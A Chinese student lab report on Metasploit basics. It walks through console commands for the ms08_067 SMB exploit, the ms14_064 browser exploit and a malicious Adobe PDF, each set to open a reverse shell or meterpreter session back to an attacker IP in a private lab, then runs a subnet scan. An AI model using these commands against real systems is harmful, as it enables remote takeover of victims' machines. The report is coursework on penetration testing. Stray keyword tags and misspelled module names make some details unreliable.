20164322 韓玉婷-----Exp5 MSF基礎應

Exp5 MSF基礎應用

1.基礎問題回答

exploit: 是指攻擊者或滲透測試者利用一個系統、應用或服務中的安全漏洞所進行的攻擊行爲, 包括利用緩衝區溢出、Web應用程序漏洞攻擊,以及利用配置錯誤等。按照所利用的安全漏洞所在的位置分爲主動滲透攻擊(攻擊某個系統服務),被動滲透攻擊(攻擊某個客戶端應用)。css

payload:目標系統在被滲透攻擊以後去執行的代碼一段指令或稱爲shellcode。linux

encode:編碼器,確保攻擊載荷中不會出現滲透攻擊過程當中應加以免的「壞字符」;改變特徵碼,對攻擊載荷進行「免殺」處理。shell


 

2.實驗內容

  2.1一個主動攻擊實踐,如ms08_067; (1分)windows

 攻擊機:kali linux ip:222.28.141.136api

 

 靶機: windows xp [版本 5.1.2600] ip:192.168.33.133 (中文版)瀏覽器

 

使用漏洞:ms08_067安全


 輸入 use exploit/windows/smb/ms08_067_netapi 網絡

設置payload,tcp反向回連  set payload generic/shell_reverse_tcp tcp

設置攻擊機ip   set LHOST 222.28.141.136 測試

設置攻擊端口     set LPORT 4322 

設置靶機ip  set RHOST 192.168.33.133 

設置自動選擇目標系統類型  set target 0 

   攻擊失敗!!!經過網上查找資料,發現多是打過補丁的緣由,更換虛擬機。因爲換了網絡,因此第二次實驗時ip也發生了變化。

 

 攻擊機:kali linux ip:192.168.33.132

 

 靶機: windows xp [version 5.1.2600] ip:192.168.33.134

 

 

重複上述步驟:

 

 

  攻擊成功!!!


 

  2.2 一個針對瀏覽器的攻擊,ms14_064;(惟一)

  攻擊機:kali linux ip:192.168.33.132

  靶機: windows xp [version 5.1.2600] ip:192.168.33.134

 

首先,我看了一下有哪些攻擊瀏覽器的漏洞可用

下面還有不少........可是不必定均可用,隨便選擇一個漏洞ms14_064試試。

輸入指令  use exploit/windows/browser/ms14_064_ole_code_execution    //使用瀏覽器ms14_064漏洞

進行以下的配置:

  set payload windows/meterpreter/reverse_http  //http反向回連

  set LHOST 192.168.33.132  //攻擊機ip

  set LPORT 4322  //攻擊端口固定

  set URIPATH 4322hyt  //統一資源標識符路徑設置

在訪問 http://192.168.33.132:8080/4322hyt 時,可見攻擊機出現訪問信息。

  攻擊成功!!!


  2.3 一個針對客戶端的攻擊,如Adobe;(1分)

 攻擊機:kali IP:192.168.119.128

 靶機:windows XP sp2 IP:192.168.119.133

 在攻擊機kali輸入msfconsole進入控制檯,輸入指令: use exloit/windows/fileformat/adobe_u3d_meshdecl 

進行以下配置:

set payload windows/meterpreter/reverse_tcp 

    set LHOST 192.168.33.136  //攻擊機ip

  set LPORT 4322  //攻擊端口

  set FILENAME hyt4322.pdf  //設置生成pdf文件的名字

  exploit  //攻擊

在以上目錄中找到該pdf文件,用共享文件夾共享到本身的主機,再拖到靶機。

在靶機上打開該pdf文件。

 

攻擊者能夠看到相應的信息,攻擊成功!!!


 

  2.4 成功應用任何一個輔助模塊。(0.5分)

  使用ARP請求枚舉本地局域網中全部活躍主機

輸入指令: use auxiliary/scanner/discovery/udp_seep 

                   show options 


    將RHOSTS設置爲 192.168.33.0/24,即掃描子網號爲192.168.33.0的子網內的全部主機

結果掃描了256個主機,4個活躍,其中192.168.33.135是靶機的IP.


 

3.實驗感想

    本次實踐讓我對msf基礎有了更加深刻的理解,見識到了它的功能強大性,意識到漏洞庫持續更新的重要性。對msf經常使用模塊的使用也在必定程度上熟練了一些。同時再遇到一些錯誤時,經過提示,進行猜想,上網查找,解決了很多問題,提升了我獨立思考的能力。

相關文章
相關標籤/搜索